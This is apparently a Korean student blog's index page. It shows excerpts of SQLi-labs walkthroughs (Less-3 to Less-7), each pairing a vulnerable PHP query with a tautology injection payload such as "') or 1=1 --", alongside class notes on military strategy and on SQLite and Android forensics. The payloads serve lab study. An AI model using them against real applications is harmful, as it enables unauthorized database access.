전체 글435 Less7-GET-Dump into outfile-String $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";?id=')) or 1=1 --%20?id=')) or (('1'='1 2019. 3. 4. Less6-GET-Double Injection-Double Quotes-String $id = '"'.$id.'"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";?id=" or "1"="1 2019. 3. 4. Less-5-GET-Double Injection-Single Quotes-String $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";?id=' or 1=1 --%20 2019. 3. 4. Less4-GET-Error based-Double Quotes-String $id = '"' . $id . '"';$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";?id=") or 1=1 --%20 ?id=") or "1"=("1 2019. 3. 4. Less3-Error based-Single quotes with twist-string $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";?id=') or 1=1 --%20?id=') or '1'=('1 2019. 3. 4. 11/23 방진catapult(투석기) catapult 다르다 ballistic missile 탄도미사일 트레부세: 지렛대에 바구니 넣어 그 안에 돌을 넣어 원심력발생 라 글루아르 2018. 11. 23. 11/19 강의자료 수정!Length of Data Header도 variable length integer로 확인 select * from sqlite_master(테이블을 관리하는 테이블=시스템테이블)sqlite expert는 시스템 테이블은 보여주지 않는다. sqlite_sequence가 우리가 과제로 했던 것여기에 bookmarks와 history => 이것은 AUTOINCREMENT설정이 되어 있다. 그래서 따로 관리 free block/ free space 시험 Realm DB는 페이지 개념이 없고 object 단위이다.object는 정해진 사이즈가 없다. column단위로 저장(sqlite는 row단위로 저장) row단위민균 20 창현 23동헌 50 column단위민균 창현 동헌20 23 50 DB는 .. 2018. 11. 19. 11/16 예방공격선제공격중간지대 포위 우회포위보다는 우회가 더 큰 범위에서 감싸는것 종심방어: 시간과 공간의 교환 *인물들: 머핸, 두에, 미첼, 트렌차드 *간접접근전략 솜므전투에서 회의적 -> 리델하트 국가이성 항재성제공권: 완전히 우세한거공중우세: 그냥 우세한거 견제!최소저항성/최소예상선 대용목표 (플랜B) 2018. 11. 16. 11/12 삭제된게 있으면 중복되는 cell offset이 있을 것이다.우리 과제는 SQLite에서 안나온다. 여러 도구를 이용하거나 헥스값을 직접 분석할 줄 알아야 한다. /data/app : 마켓에서 다운받은 앱/system/app : preload(선탑재) 되어 있는 앱 컴퓨터에 연결할 때 마운트 되는 곳->/misc/sdcard 안드로이드는 리눅스 기반Android Runtime->Dalvik Virtual Machine 만능통역가느낌 Content Provider -> 권한요청(다른 어플 접근)/ 지금은 유효하지 않다. dex: dalvik machine executable : Dalvik machine에서 동작하는 파일res: resource의 약자(커널플래싱할때 default.prop파일이랑 adbd파.. 2018. 11. 12. 이전 1 ··· 4 5 6 7 8 9 10 ··· 49 다음